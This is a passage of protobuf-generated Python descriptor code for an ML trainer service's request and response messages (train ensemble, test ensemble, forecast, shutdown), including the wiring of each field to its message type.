serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='featuresImportance', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.featuresImportance', index=13,
number=14, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TESTRESPONSE_PIPFREEZEENTRY, _TESTRESPONSE_FEATURESIMPORTANCEENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3544,
serialized_end=4404,
)
_TRAINENSEMBLEREQUEST_SECRETENTRY = _descriptor.Descriptor(
name='SecretEntry',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.SecretEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.SecretEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.SecretEntry.value', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1230,
serialized_end=1275,
)
_TRAINENSEMBLEREQUEST = _descriptor.Descriptor(
name='TrainEnsembleRequest',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='product', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.product', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.version', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bucket', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.bucket', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='base', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.base', index=3,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='model', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.model', index=4,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='study', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.study', index=5,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datasource', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.datasource', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dataset', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.dataset', index=7,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='connection', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.connection', index=8,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='secret', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.secret', index=9,
number=11, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TRAINENSEMBLEREQUEST_SECRETENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4407,
serialized_end=5331,
)
_TESTENSEMBLEREQUEST_SECRETENTRY = _descriptor.Descriptor(
name='SecretEntry',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.SecretEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.SecretEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.SecretEntry.value', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1230,
serialized_end=1275,
)
_TESTENSEMBLEREQUEST = _descriptor.Descriptor(
name='TestEnsembleRequest',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='product', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.product', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.version', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bucket', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.bucket', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='base', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.base', index=3,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='model', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.model', index=4,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='study', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.study', index=5,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datasource', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.datasource', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dataset', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.dataset', index=7,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='connection', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.connection', index=8,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='secret', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.secret', index=9,
number=11, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TESTENSEMBLEREQUEST_SECRETENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5334,
serialized_end=6256,
)
_FORECASTREQUEST_SECRETENTRY = _descriptor.Descriptor(
name='SecretEntry',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.SecretEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.SecretEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.SecretEntry.value', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1230,
serialized_end=1275,
)
_FORECASTREQUEST = _descriptor.Descriptor(
name='ForecastRequest',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='product', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.product', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.version', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bucket', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.bucket', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='model', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.model', index=3,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='study', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.study', index=4,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datasource', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.datasource', index=5,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dataset', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.dataset', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='connection', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.connection', index=7,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='secret', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.secret', index=8,
number=10, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_FORECASTREQUEST_SECRETENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6259,
serialized_end=7094,
)
_FORECASTRESPONSE = _descriptor.Descriptor(
name='ForecastResponse',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='forecastCloudUri', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastResponse.forecastCloudUri', index=0,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7096,
serialized_end=7140,
)
_SHUTDOWNREQUEST = _descriptor.Descriptor(
name='ShutdownRequest',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ShutdownRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7142,
serialized_end=7159,
)
_SHUTDOWNRESPONSE = _descriptor.Descriptor(
name='ShutdownResponse',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ShutdownResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7161,
serialized_end=7179,
)
_TRAINREQUEST_SECRETENTRY.containing_type = _TRAINREQUEST
_TRAINREQUEST.fields_by_name['product'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCT
_TRAINREQUEST.fields_by_name['version'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCTVERSION
_TRAINREQUEST.fields_by_name['bucket'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._VIRTUALBUCKET
_TRAINREQUEST.fields_by_name['model'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_TRAINREQUEST.fields_by_name['study'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._STUDY
_TRAINREQUEST.fields_by_name['datasource'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASOURCE
_TRAINREQUEST.fields_by_name['dataset'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASET
_TRAINREQUEST.fields_by_name['connection'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._CONNECTION
_TRAINREQUEST.fields_by_name['secret'].message_type = _TRAINREQUEST_SECRETENTRY
_TRAINRESPONSE_PIPFREEZEENTRY.containing_type = _TRAINRESPONSE
_TRAINRESPONSE_FEATURESIMPORTANCEENTRY.containing_type = _TRAINRESPONSE
_TRAINRESPONSE.fields_by_name['result'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_catalog_dot_v1alpha1_dot_generated__pb2._MEASUREMENT
_TRAINRESPONSE.fields_by_name['pipFreeze'].message_type = _TRAINRESPONSE_PIPFREEZEENTRY
_TRAINRESPONSE.fields_by_name['featuresImportance'].message_type = _TRAINRESPONSE_FEATURESIMPORTANCEENTRY
_COMPILEREQUEST_SECRETENTRY.containing_type = _COMPILEREQUEST
_COMPILEREQUEST.fields_by_name['product'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCT
_COMPILEREQUEST.fields_by_name['version'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCTVERSION
_COMPILEREQUEST.fields_by_name['bucket'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._VIRTUALBUCKET
_COMPILEREQUEST.fields_by_name['model'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_COMPILEREQUEST.fields_by_name['study'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._STUDY
_COMPILEREQUEST.fields_by_name['datasource'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASOURCE
_COMPILEREQUEST.fields_by_name['dataset'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASET
_COMPILEREQUEST.fields_by_name['connection'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._CONNECTION
_COMPILEREQUEST.fields_by_name['secret'].message_type = _COMPILEREQUEST_SECRETENTRY
_TESTREQUEST_SECRETENTRY.containing_type = _TESTREQUEST
_TESTREQUEST.fields_by_name['product'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCT
_TESTREQUEST.fields_by_name['version'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCTVERSION
_TESTREQUEST.fields_by_name['bucket'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._VIRTUALBUCKET
_TESTREQUEST.fields_by_name['model'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_TESTREQUEST.fields_by_name['study'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._STUDY
_TESTREQUEST.fields_by_name['datasource'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASOURCE
_TESTREQUEST.fields_by_name['dataset'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASET
_TESTREQUEST.fields_by_name['connection'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._CONNECTION
_TESTREQUEST.fields_by_name['secret'].message_type = _TESTREQUEST_SECRETENTRY
_TESTRESPONSE_PIPFREEZEENTRY.containing_type = _TESTRESPONSE
_TESTRESPONSE_FEATURESIMPORTANCEENTRY.containing_type = _TESTRESPONSE
_TESTRESPONSE.fields_by_name['train_result'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_catalog_dot_v1alpha1_dot_generated__pb2._MEASUREMENT
_TESTRESPONSE.fields_by_name['test_result'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_catalog_dot_v1alpha1_dot_generated__pb2._MEASUREMENT
_TESTRESPONSE.fields_by_name['benchmark_result'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_catalog_dot_v1alpha1_dot_generated__pb2._MEASUREMENT
_TESTRESPONSE.fields_by_name['pipFreeze'].message_type = _TESTRESPONSE_PIPFREEZEENTRY
_TESTRESPONSE.fields_by_name['featuresImportance'].message_type = _TESTRESPONSE_FEATURESIMPORTANCEENTRY
_TRAINENSEMBLEREQUEST_SECRETENTRY.containing_type = _TRAINENSEMBLEREQUEST
_TRAINENSEMBLEREQUEST.fields_by_name['product'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCT
_TRAINENSEMBLEREQUEST.fields_by_name['version'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCTVERSION
_TRAINENSEMBLEREQUEST.fields_by_name['bucket'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._VIRTUALBUCKET
_TRAINENSEMBLEREQUEST.fields_by_name['base'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_TRAINENSEMBLEREQUEST.fields_by_name['model'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_TRAINENSEMBLEREQUEST.fields_by_name['study'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._STUDY
_TRAINENSEMBLEREQUEST.fields_by_name['datasource'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASOURCE
_TRAINENSEMBLEREQUEST.fields_by_name['dataset'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASET
_TRAINENSEMBLEREQUEST.fields_by_name['connection'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._CONNECTION
_TRAINENSEMBLEREQUEST.fields_by_name['secret'].message_type = _TRAINENSEMBLEREQUEST_SECRETENTRY
_TESTENSEMBLEREQUEST_SECRETENTRY.containing_type = _TESTENSEMBLEREQUEST
_TESTENSEMBLEREQUEST.fields_by_name['product'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCT
_TESTENSEMBLEREQUEST.fields_by_name['version'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCTVERSION
_TESTENSEMBLEREQUEST.fields_by_name['bucket'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._VIRTUALBUCKET
_TESTENSEMBLEREQUEST.fields_by_name['base'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_TESTENSEMBLEREQUEST.fields_by_name['model'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_TESTENSEMBLEREQUEST.fields_by_name['study'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._STUDY
_TESTENSEMBLEREQUEST.fields_by_name['datasource'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASOURCE
_TESTENSEMBLEREQUEST.fields_by_name['dataset'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASET
_TESTENSEMBLEREQUEST.fields_by_name['connection'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._CONNECTION
_TESTENSEMBLEREQUEST.fields_by_name['secret'].message_type = _TESTENSEMBLEREQUEST_SECRETENTRY
_FORECASTREQUEST_SECRETENTRY.containing_type = _FORECASTREQUEST
_FORECASTREQUEST.fields_by_name['product'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCT
_FORECASTREQUEST.fields_by_name['version'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCTVERSION
_FORECASTREQUEST.fields_by_name['bucket'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._VIRTUALBUCKET
_FORECASTREQUEST.fields_by_name['model'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
